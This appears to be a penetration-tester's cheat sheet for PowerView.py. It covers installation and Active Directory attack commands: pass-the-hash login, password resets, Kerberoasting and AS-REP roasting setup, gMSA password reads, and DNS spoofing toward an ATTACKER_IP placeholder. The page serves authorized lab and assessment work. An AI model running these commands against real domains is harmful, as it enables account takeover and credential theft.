🧠PowerView.py

Introduction

PowerView.py is an alternative to the fantastic original PowerView.ps1 script. Most of the modules used in PowerView are available here (some of the flags have changed). The main goal is to achieve an interactive session without having to repeatedly authenticate to LDAP.

PowerView.py Logo

GitHub Repository: aniqfakhrul/powerview.py - Just another Powerview alternative

Installation

Before installing PowerView.py, you need to install the required system dependencies:

sudo apt install libkrb5-dev

Then install PowerView using pip:

pip3 install powerview --break-system-packages

Usage

PowerView.py supports multiple authentication methods for connecting to Active Directory environments.

Basic Authentication (Username/Password)

powerview domain.htb/user:'password'@10.10.10.10 --dc-ip 10.10.10.10

Pass-the-Hash (PtH) Authentication

powerview domain.htb/user@10.10.10.10 -H '01e97f85894e06a5ad698f624b9a7ee9' --dc-ip 10.10.10.10

Kerberos Authentication

powerview domain.htb/user@dc.domain.htb --dc-ip 10.10.10.10 -ns dc.domain.htb -k --no-pass

Web Browser Interface

PowerView.py also provides a web interface for easier interaction:

powerview domain.htb/'user':'password'@10.10.10.10 --web --web-host 127.0.0.1 --web-port 3000

Attacking Active Directory with PowerView.py

PowerView.py provides various commands for Active Directory enumeration and exploitation. Below are some common attack scenarios and their corresponding commands.

User and Group Management

Add User to Group

Add a user to a specific domain group:

Add-DomainGroupMember -Identity 'GROUP_TARGET' -Members 'USER_TARGET'

Modify User Password

Change a user's password (requires appropriate permissions):

Set-DomainUserPassword -Identity 'user_target' -AccountPassword 'Password01!'

Add New Domain User

Create a new user in the domain:

Add-ADUser -UserName 'Gzzcoo' -UserPass 'Password01!'

Kerberoasting Attacks

Set ServicePrincipalName for Kerberoasting

Assign a ServicePrincipalName (SPN) to a user for Kerberoasting attacks. This requires GenericAll/GenericWrite permissions on the target user:

Set-DomainObject -Identity "TARGET" -Set 'servicePrincipalname=cifs/gzzcoo'

Execute Kerberoasting Attack

Perform Kerberoasting to extract service tickets:

Invoke-Kerberoast

ASREPRoasting Attacks

Enable DONT_REQ_PREAUTH for ASREPRoast

Configure a user account to not require Kerberos pre-authentication. This requires GenericAll/GenericWrite permissions on the target user:

Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=4260352'

Account Management

Enable Disabled User Account

Remove the ACCOUNTDISABLE flag to enable a disabled user account:

Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=66048'

GMSA (Group Managed Service Accounts)

Read GMSA Password

Extract Group Managed Service Account passwords:

Get-GMSA

Object Ownership and Permissions

Change Object Owner

Make a user the owner of a specific object:

Set-DomainObjectOwner -TargetIdentity 'object_target' -PrincipalIdentity 'user_target'

Computer Management

Add New Domain Computer

Create a new computer account in the domain:

Add-ADComputer -ComputerName 'Gzzcoo' -ComputerPass 'Password01!'

DNS Manipulation

Create DNS Record for Spoofing

Add a new DNS record for DNS spoofing attacks:

Add-DomainDNSRecord -RecordName '<dns_record_target>' -RecordAddress <ATTACKER_IP>

Security Considerations

When using PowerView.py for penetration testing or security assessments:

  • Always ensure you have proper authorization before testing

  • Use these tools only in authorized environments

  • Document all activities for reporting purposes

  • Follow responsible disclosure practices

  • Be aware of the potential impact of your actions on production systems

Troubleshooting

If you encounter issues during installation or usage:

  1. Ensure all dependencies are properly installed

  2. Verify network connectivity to the target domain controller

  3. Check authentication credentials and permissions

  4. Review error messages for specific guidance

  5. Consult the GitHub repository for updates and known issues

Resources

Last updated